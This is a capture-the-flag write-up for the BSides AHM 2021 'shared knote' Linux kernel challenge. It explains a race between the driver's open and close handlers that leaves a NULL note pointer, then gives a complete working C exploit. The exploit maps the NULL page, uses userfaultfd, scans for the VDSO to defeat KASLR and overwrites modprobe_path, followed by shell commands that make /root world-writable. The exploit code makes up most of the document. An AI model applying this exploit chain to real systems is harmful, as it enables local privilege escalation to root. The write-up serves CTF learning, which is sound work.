# shared knote - BSides AHM 2021
###### tags: `BSides AHM 2021`

## Challenge Overview
Kernel Exploit challenge!

- KASLR: Enabled
- SMAP: Disabled
- SMEP: Disabled
- KPTI: Enabled

The driver implements `open`, `read`, `write`, `seek`, and `close` handlers.
You can store data in the following memo structure.

```c
typedef struct {
  unsigned long refcnt;
  note_t *noteptr;
} shared_note;

shared_note sknote = {.refcnt = 0, .noteptr = NULL};
```

The driver doesn't acquire a lock on `open`, so multiple users can open the device at once.
The reference counter is meant to prevent race conditions on the shared resource.
The buffer is allocated on the first `open`; every later `open` just increments the reference counter.

```c
  unsigned long old = __atomic_fetch_add(&sknote.refcnt, 1, __ATOMIC_SEQ_CST);
  if (old == 0) {

    /* First one to open the note */
    if (!(sknote.noteptr = kzalloc(sizeof(note_t), GFP_KERNEL)))
      return -ENOMEM;
    if (!(sknote.noteptr->data = kzalloc(MAX_NOTE_SIZE, GFP_KERNEL)))
      return -ENOMEM;

  } else if (old >= 0xff) {

    /* Too many references */
    __atomic_sub_fetch(&sknote.refcnt, 1, __ATOMIC_SEQ_CST);
    return -EBUSY;

  }
```

The counter is decremented by calling `close`. When the counter reaches 0, the buffer is actually freed.

```c
static int module_close(struct inode *inode, struct file *file)
{
  if (__atomic_add_fetch(&sknote.refcnt, -1, __ATOMIC_SEQ_CST) == 0) {
    /* We can free the note as nobody references it */
    kfree(sknote.noteptr->data);
    kfree(sknote.noteptr);
    sknote.noteptr = NULL;
  }

  return 0;
}
```

## Vulnerability
The driver takes no lock so that multiple users can share the buffer.
However, it SHOULD take a lock inside the open and close handlers.
Each operation on the reference counter is atomic, but the handler as a whole is not, so the handlers themselves are not thread-safe.

```c
  if (__atomic_add_fetch(&sknote.refcnt, -1, __ATOMIC_SEQ_CST) == 0) {
    kfree(sknote.noteptr->data);
    /* Context-switch may take place here! */
    kfree(sknote.noteptr);
    sknote.noteptr = NULL;
  }
```

This causes a serious problem.
If a context switch moves execution from just before the end of `module_open` into the middle of `module_close`, the following happens:

0. `close`: Decrement refcnt (1 --> 0)
1. `open`: Increment refcnt (0 --> 1)
2. `open`: Allocate note
3. `open`: Allocate buffer <-- context switch
4. `close`: noteptr = NULL

So, `sknote.noteptr` can be NULL even when `refcnt` is not zero.
Since the driver doesn't check `noteptr`, a NULL pointer dereference happens in some functions:

```c
module_read:
  /* note can be NULL */
  if (copy_to_user(buf, &note->data[file->f_pos], count))
    return -EFAULT; // Invalid user pointer
...
module_write:
  /* note can be NULL */
  if (copy_from_user(&note->data[file->f_pos], buf, count))
    return -EFAULT;
```

Checking `/proc/sys/vm/mmap_min_addr`, you'll notice that the user can map the NULL page.
Combining this fact with the vulnerability (and with SMAP being disabled), the attacker can control the values of `note->data` and `note->length`.
Once you control them, it's easy to create Arbitrary Address Read (AAR) and Arbitrary Address Write (AAW, write-what-where) primitives.

## Exploit
This is the hardest pwn in this CTF. It's not that easy.

### Winning the Race
You need to stop racing right after `noteptr` becomes NULL with a positive refcnt.
Otherwise, the next `close` or `open` call will operate on the NULL pointer and crash.

```c
module_open:
    if (!(sknote.noteptr = kzalloc(sizeof(note_t), GFP_KERNEL)))
      return -ENOMEM;
    /* vvv Possibly Crash vvv*/
    if (!(sknote.noteptr->data = kzalloc(MAX_NOTE_SIZE, GFP_KERNEL)))
      return -ENOMEM;
...
module_close:
  if (__atomic_add_fetch(&sknote.refcnt, -1, __ATOMIC_SEQ_CST) == 0) {
    /* vvv Likely Crash vvv */
    kfree(sknote.noteptr->data);
    kfree(sknote.noteptr);
    sknote.noteptr = NULL;
  }
```

One idea is to use `read` or `write` to check whether you have actually obtained AAR/AAW.
However, you need to call `read` or `write` after `open`, which is very slow compared to `close`.
So, this method is very unlikely to succeed.

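
For reference, the `read`-based probe just described could be sketched roughly as follows. This is only an illustration, not code from the challenge or the final exploit: `looks_like_fake_note` and the `MARKER` constant are made-up names, and the sketch assumes that a fake `note_t` with `length = 6` and `data = "Hello!"` has already been placed on the NULL page.

```c
#include <string.h>
#include <unistd.h>

/* Hypothetical marker: assumed to be the bytes the fake note on the NULL page points at. */
#define MARKER "Hello!"
#define MARKER_LEN 6

/* Returns 1 if a read from fd yields exactly the marker bytes, 0 otherwise. */
int looks_like_fake_note(int fd) {
  char buf[16];
  ssize_t n = read(fd, buf, sizeof(buf));
  return n == MARKER_LEN && memcmp(buf, MARKER, MARKER_LEN) == 0;
}
```

Calling such a probe after every `open` adds a full `read` syscall to each iteration of the race loop, which is why the window is so hard to hit this way.
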
My idea is to use userfaultfd on the NULL page.
If you register a page fault handler for the NULL page, you receive a notification when the driver tries to access the NULL pointer.
You can then take control of the note struct while the fault is being handled and quit the race loop.

### Bypassing KASLR
We still need to bypass KASLR even though we have AAR and AAW. How?

The AAR/AAW is realized by `copy_to_user` and `copy_from_user`.
Both of them are designed to be very safe: they check the accessibility of the address before trying to copy data.
This means our AAR/AAW will never crash even if the address is invalid.

So, you can simply brute force the address to find the kernel base or the credential store.
As far as I know, however, these methods take quite a long time to find the address.

My method is to search for the VDSO region.
VDSO is easy to spot and it's near the kernel data region.
You can find `modprobe_path` from VDSO.

## Full Exploit

```c
#define _GNU_SOURCE
#include <stdlib.h>
#include <string.h>
#include <stdio.h>
#include <fcntl.h>
#include <unistd.h>
#include <pthread.h>
#include <errno.h>
#include <poll.h>
#include <arpa/inet.h>
#include <sys/wait.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <sys/ipc.h>
#include <sys/shm.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/syscall.h>
#include <sys/un.h>
#include <sys/xattr.h>
#include <sys/stat.h>
#include <sys/prctl.h>
#include "userfaultfd.h"

typedef struct {
  ssize_t length;
  char *data;
} note_t;

void fatal(const char *msg) {
  perror(msg);
  exit(1);
}

/* Set by the fault handler once the kernel touches the NULL page;
   volatile because it is polled from other threads */
volatile int win = 0;
static int page_size;

static void *fault_handler_thread(void *arg) {
  static struct uffd_msg msg;
  static int fault_cnt = 0;
  long uffd;
  static char *page = NULL;
  struct uffdio_copy uffdio_copy;
  int len;

  if (page == NULL) {
    page = mmap(NULL, page_size, PROT_READ | PROT_WRITE,
                MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (page == MAP_FAILED) fatal("mmap (userfaultfd)");
  }

  uffd = (long)arg;

  for(;;) {
    struct pollfd pollfd;
    pollfd.fd = uffd;
    pollfd.events = POLLIN;
    len = poll(&pollfd, 1, -1);
    if (len == -1) fatal("poll");

    /* The driver dereferenced NULL: stop the race loops */
    win = 1;

    printf("[+] fault_handler_thread():\n");
    printf("    poll() returns: nready = %d; "
           "POLLIN = %d; POLLERR = %d\n", len,
           (pollfd.revents & POLLIN) != 0,
           (pollfd.revents & POLLERR) != 0);

    len = read(uffd, &msg, sizeof(msg));
    if (len == 0) fatal("userfaultfd EOF");
    if (len == -1) fatal("read");
    if (msg.event != UFFD_EVENT_PAGEFAULT) fatal("msg.event");

    printf("[+] UFFD_EVENT_PAGEFAULT event: \n");
    printf("    flags = 0x%llx\n", msg.arg.pagefault.flags);
    printf("    address = 0x%llx\n", msg.arg.pagefault.address);

    switch(fault_cnt) {
    case 0: {
      /* First fault: back the NULL page with a zero-filled page */
      uffdio_copy.src = (unsigned long)page;
      break;
    }
    default:
      puts("[-] Ponta?");
      getchar();
      break;
    }

    // return to kernel-land
    uffdio_copy.dst = (unsigned long)msg.arg.pagefault.address & ~(page_size - 1);
    uffdio_copy.len = page_size;
    uffdio_copy.mode = 0;
    uffdio_copy.copy = 0;
    if (ioctl(uffd, UFFDIO_COPY, &uffdio_copy) == -1) fatal("ioctl: UFFDIO_COPY");
    printf("[+] uffdio_copy.copy = %lld\n", uffdio_copy.copy);

    fault_cnt++;
  }
}

void setup_pagefault(void *addr, unsigned size) {
  long uffd;
  pthread_t th;
  struct uffdio_api uffdio_api;
  struct uffdio_register uffdio_register;

  // new userfaultfd
  page_size = sysconf(_SC_PAGE_SIZE);
  uffd = syscall(__NR_userfaultfd, O_CLOEXEC | O_NONBLOCK);
  if (uffd == -1) fatal("userfaultfd");

  // enable uffd object
  uffdio_api.api = UFFD_API;
  uffdio_api.features = 0;
  if (ioctl(uffd, UFFDIO_API, &uffdio_api) == -1)
    fatal("ioctl: UFFDIO_API");

  // register memory address
  uffdio_register.range.start = (unsigned long)addr;
  uffdio_register.range.len = size;
  uffdio_register.mode = UFFDIO_REGISTER_MODE_MISSING;
  if (ioctl(uffd, UFFDIO_REGISTER, &uffdio_register) == -1)
    fatal("ioctl: UFFDIO_REGISTER");

  // monitor page fault
  if (pthread_create(&th, NULL, fault_handler_thread, (void*)uffd))
    fatal("pthread_create");
}

/* Closing side of the race: keeps closing whatever main() opens */
void *race(void *arg) {
  int *fds = (int*)arg;
  while (!win) {
    for (int i = 0; !win && (i < 0x100); i++)
      close(fds[i]);
    usleep(1);
  }
  return NULL;
}

int main() {
  pthread_t th;
  int fd = -1, fds[0x100] = { 0 };
  char *buf = malloc(0x1000);

  /* Prepare a fake note structure */
  note_t *nullptr = (note_t*)mmap((void*)0, 0x1000,
                                  PROT_READ | PROT_WRITE,
                                  MAP_ANONYMOUS | MAP_PRIVATE | MAP_FIXED,
                                  -1, 0);
  if (nullptr == MAP_FAILED) fatal("mmap");
  setup_pagefault(nullptr, 0x1000);

  /* Race condition */
  alarm(1); // sometimes race fails
  puts("[+] Race...");
  pthread_create(&th, NULL, race, (void*)fds);
  while (!win) {
    for (int i = 0; !win && (i < 0x100); i++)
      fds[i] = open("/dev/sknote", O_RDWR);
    usleep(1);
  }
  pthread_join(th, NULL);
  alarm(0);

  /* Find victim fd */
  nullptr->length = 6;
  nullptr->data = "Hello!";
  for (int i = 0; i < 0x100; i++) {
    if (read(fds[i], buf, 0x10) == 6) {
      puts("[+] Hit!");
      fd = fds[i];
      break;
    }
    if (i == 0xff) {
      puts("[-] Bad luck!");
      exit(1);
    }
  }

  /* Search VDSO */
  puts("[+] Searching VDSO...");
  unsigned long search_base = 0;
  nullptr->length = 8;
  for (size_t addr = 0xffffffff80000000;
       addr < 0xffffffffffffb000;
       addr += 0x1000) {
    if (addr % 0x100000000 == 0)
      printf("Searching 0x%lx...\n", addr);

    /* Leak data */
    nullptr->data = (void*)addr;
    lseek(fd, 0, SEEK_SET);
    if (read(fd, buf, 8) != 8) continue;
    if (memcmp(buf, "\x7f\x45\x4c\x46\x02\x01\x01\x00", 8) != 0) continue;

    /* Found ELF header */
    nullptr->length = 0x1000;
    lseek(fd, 0, SEEK_SET);
    read(fd, buf, 0x1000);
    if (memmem(buf, 0x1000, "clock_gettime", 13)) {
      search_base = addr & 0xffffffffff000000;
      search_base -= 0x2000000;
      printf("[+] vdso: 0x%lx\n", addr);
      printf("[+] rough kbase: 0x%lx\n", search_base);
      break;
    }
    nullptr->length = 8;
  }
  if (search_base == 0) {
    puts("[-] Bad luck!");
    exit(1);
  }

  /* Search unique string to find the kernel base */
  unsigned long kbase = 0;
  nullptr->length = 15;
  for (unsigned long addr = search_base;
       addr < search_base + 0x10000000;
       addr += 0x100000) {
    nullptr->data = (void*)(addr + 0x1036000); // "/sbin/poweroff"
    lseek(fd, 0, SEEK_SET);
    read(fd, buf, 15);
    if (strcmp(buf, "/sbin/poweroff") == 0) {
      // Actually this is not the real base address (off by 0x200000)
      // but is correct as a relative address for modprobe_path
      kbase = addr;
      printf("[+] kbase = 0x%lx\n", kbase);
      break;
    }
  }
  if (kbase == 0) {
    puts("[-] Bad luck!");
    exit(1);
  }

  /* Overwrite modprobe_path */
  nullptr->length = 0x1000;
  nullptr->data = (void*)(kbase + 0x10367c0);
  lseek(fd, 0, SEEK_SET);
  write(fd, "/tmp/hal", 9);

  /* Close every file descriptor (because close takes place after unmap) */
  nullptr->length = 0;
  nullptr->data = NULL;
  for (int i = 0; i < 0x1000; i++) {
    close(i);
  }

  return 0;
}
```

After running this exploit, write the following script to `/tmp/hal` (the new `modprobe_path`) and make it executable:

```bash
#!/bin/sh
chmod -R 777 /root
```

Then run:

```bash
$ echo -e '\xff\xff\xff\xff' > x
$ chmod +x x
$ ./x
$ cat /root/flag.txt
```